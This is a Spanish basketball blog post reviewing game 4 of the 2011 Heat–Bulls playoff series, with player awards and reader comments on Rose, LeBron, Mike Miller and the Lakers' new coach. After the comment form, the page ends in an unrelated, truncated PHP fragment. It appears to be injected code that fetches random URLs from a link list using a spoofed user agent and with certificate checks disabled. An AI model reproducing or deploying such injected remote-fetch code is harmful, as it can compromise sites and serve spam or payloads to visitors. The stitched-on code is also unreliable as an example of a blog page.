Playoffs (24/05/2011): Media verónica

25 de May de 2011 por TheDeerHunter

Se perfila revancha en la finalísima de la NBA. Los Heat supieron esquivar el ímpetu de los toros en el 4º choque en Miami y cerraron en la prórroga un 3-1 que les deja tocando con los dedos el campeonato del Este (93-101). Y es que los Bulls salieron convencidos de poder empatar la eliminatoria. Gran partido de Boozer y Deng. Rose continúa en su línea de irregularidad en esta serie y Noah jugó algo mejor que otros días. Es raro ver que un equipo cosa a contraataques a los Heat y ayer sucedió. El equipo de Florida aguantó haciendo la goma durante los tres primeros cuartos entre otras cosas gracias a las segundas unidades. Desconocemos porqué Thibodeau le dio tan poco protagonismo a Gibson, como tampoco apenas obtuvo producción de Brewer, Korver y Watson. Por su parte Spoelstra sacó petróleo de Chalmers, Haslem y, sobre todo de Mike Miller que, sin aspavientos, cuajó su mejor partido del año. El indicador +/- de su boxscore indica un +36. Demoledor. Nadie ha conseguido algo así en postemporada los últimos 15 años. Se puede decir que tanto Miller como Haslem finalmente están marcando la diferencia como esperábamos al principio.

En otro partido flojo de Wade, Bosh y LeBron fueron fundamentales para aguantar el equipo. Ayer el ex-MVP se comió al vigente. The King se encargó de Rose en los momentos críticos y al base de Chicago se le hizo de noche. El resultado diáfano: 0 de 5 y 1 pérdida. James puede defender a Rose pero no al contrario. Esa fue la diferencia anoche entre el éxito y el fracaso.

Los Bulls, como les pasó a Thunder la noche anterior pagaron la novatada. Tuvieron el partido en sus manos y se colapsaron en el filo de la navaja. Es difícil resolver peor varias jugadas decisivas y llegaron a la prórroga como cordero al matadero. No dieron ni una. Como en el equipo de Durant los Bulls tendrán que recuperarse del golpe moral antes de pensar en aguantar el próximo partido. No lo van a tener fácil.

PREMIOS

MVP: De llegar Miami y Dallas a la final, veremos enfrentarse a los 2 mejores jugadores de estos playoffs: Dirk Nowitzki contra Lebron James. El de los Heat anoche se fue a los 35 puntos, 6 rebotes y 6 asistencias y defendió perfectamente a Derrick Rose en las últimas jugadas del último cuarto.

Sorpresa: En banquillo de los de Florida sigue respondiendo. Si en la primera victoria destacamos a Haslem y en la segunda a Chalmers, hoy toca resaltar a Mike Miller, padre la semana pasada. Anotó 12 puntos (9 en el último cuarto), capturó 9 rebotes, defendió como un jabato y, lo que es más increíble, con él en pista los Heat acumularon un parcial de +36. Récord absoluto de un jugador de banquillo en un partido de playoffs empatado con el gran Nick Van Exel.

Decepción: Empieza a ser momento de apuntar el dedo directamente a Derrick Rose. El base de los Bulls está siendo perfectamente defendido y en ningún momento ha encontrado su juego en esta serie. Anoche no fue una excepción. Perdió 7 balones y sólo fue capaz de anotar 8 tiros de 27 intentos.

Esfuerzo en vano: Esta vez el mejor de los Bulls volvió a ser Luol Deng. El británico-senegalés cuajó un partido muy completo con 20 puntos, 8 rebotes, 2 asistencias, 3 robos y 2 tapones.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Y Rose sigue tirando triples y fallandolos… 1 de 9 hoy…

      Citar

  2. Cocinitas dice:
    #2

    Creo que este año les falta experiencia tanto a Bulls como a Thunder para llegar más lejos, pero el año que viene será otro cantar.
    La noticia hoy en USA es que los Lakers tienen por fin nuevo técnico…………. Mike Brown. Que os parece la noticia???? Por lo visto cobrará 18m por 4 temporadas y lo van a hacer oficial el jueves. A mi me parece que Brown tendrá problemas con la actitud de muchos jugadores si quiere hacer un baloncesto defensivo como el que hizo en Cavs. Que trades creeis que se produciran???

      Citar

  3. GreenPride dice:
    #3

    Antes de empezar, ¿Mike Brown tecnico de los Lakers? Vaya tela lo de LA. Me parece una muy mala elección por lo que hemos visto de este técnico hasta ahora. En los Cavs no tenía jugadas de ataque más allá del LeBron-sistema y no estuvo nunca muy lúcido a la hora de cambiar los partidos de playoffs. A priori me parece una cantada de LA veremos cómo les sale.
    En cuanto al partido de ayer, partidazo de playoffs, gran tensión y los Bulls muriendo en la orilla en un partido que lucharon como verdaderos toros. Empezaron fuerte los Bulls cargando el rebote y con un inspirado Deng. Luego se recuperaron los Heat apretando en defensa y encontrando a LeBron. A partir de finales del segundo cuarto los Bulls consiguieron una corta ventaja que mantuvieron hasta mediados del último cuarto cuando LeBron le hizo la vida imposible a Rose y el ataque de Chicago se colapsó. Con la ayuda de un gran Mike Miller (9 puntos en el último cuarto) y de algún tiro de Bosh, LeBron guió a su equipo hasta el empate. Una vez ahí y con la bola decisiva en sus manos cometió una falta de ataque que le dió la última posesión a los Bulls. Pero como durante todas las últimas jugadas Rose no pudo en el 1×1 contra el Rey y se fue a la prorroga.
    Y aquí una pregunta, si Rose llevaba varias posesiones sin poder en uno contra uno con James, ¿Por qué jugarte así la bola decisiva? ¿Por qué no un pick&roll con Boozer para intentar evitar la defensa del rey sobre Rose y crear dudas defensivas a los Heat? A veces los entrenadores NBA pecan de muy conservadores en estas jugadas dejándolo todo a que el jugador estrella la meta en 1×1.
    En la prorroga y como pasó en el partido de los Thunder, los Bulls era cadáveres mentalmente y fueron pasados por encima por los Heat con varios tapones espectaculares de Wade que se redimió así un poco de su nefasto partido hasta ese momento.
    Todo parece preparado para la revancha de las Finales de 2006 entre Heat y Mavs, veremos si Thunder y Bulls pueden recuperarse de estas moralmente devastadoras derrotas en los cuartos partidos y dar un poco de más guerra aunque parece casi imposible que puedan dar la vuelta a las eliminatorias

      Citar

  4. lopez dice:
    #4

    Rose está siendo un Westbrook 2.0, mal en el tiro, pésimo en la dirección…Vamos, que la temporada de los Bulls ha sido buenísima, pero al MVP le queda todavía mucho por aprender. En la final se encontrarán los dos mejores jugadores de estos playoffs, Lebron y Dirk, pero me da que el anillo se va a Miami.

      Citar

  5. Jona dice:
    #5

    una pregunta
    que pasa con james jones fue decisivo contra celtics y ahora no juega?

      Citar

  6. Txusma dice:
    #6

    Lo de Mike Brown aún hay q cerrarlo pero es el que está mejor posicionados. El otro aspirante parece ser Rick Adelman. Para mi no hay color…

      Citar

  7. Denise dice:
    #7

    No nos engañemos, a pesar de la buena campaña de Deng, Boozer o Noah, los Bulls sufrían una excesiva dependencia de Rose, y en el momento en que se ha encontrado una defensa en condiciones, pues adiós.
    De concretarse lo de Mike Brown por L.A. sería una gran cagada en mi opinión. Preparense para un Kobe-sistema, si es que el anterior sistema no lo era….

      Citar

  8. blade petrovic dice:
    #8

    Para empezar soi nuevo en el blog, lo descubri porque un amigo me lo dijo y he estado ojeando por el blog y me ha gustado lo de la fantasy league aun la seguis haciendo es porque me gustaria participar.
    Saludos:blade petrovic

      Citar

  9. Cocinitas dice:
    #9

    Y suena como asistente MESSINA!!!!!

      Citar

  10. Cocinitas dice:
    #10

    Me parto de risa con los de Marca, de verdad no se de donde sacan estas noticias.

      Citar

  11. Cocinitas dice:
    #11

    Perdón por mi error no ha sido Marca ha sido el diario As

      Citar

  12. Javijaen dice:
    #12

    Gran partido en Miami, donde Rose va a dejar mal sabor de boca con su MVP. Y eso que estuvo muy bien mientras que le defendieron Bibby-Chalmers y luego la prueba de Wade defendiendo tampoco fue buena. Ahora, Spolestra va meneando el equipo sabiamente, y premió el gran partido de Haslem y Miller.
    Ultimos embistes de los toros, que son fortísimos bajo aro con Noah y Boozer, pero si Rose no está acertado, por muchos triples que metan Korver-Deng y compañía…
    Por cierto, con Bosh llegando al overtime con 5 faltas y no intentar provocarla sexta con Boozer o Noah, no me cuadra mucho…
    ¿Será que los premios de Tim y de Derrick se han quedado por el camino? A ver que opina Lebron…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>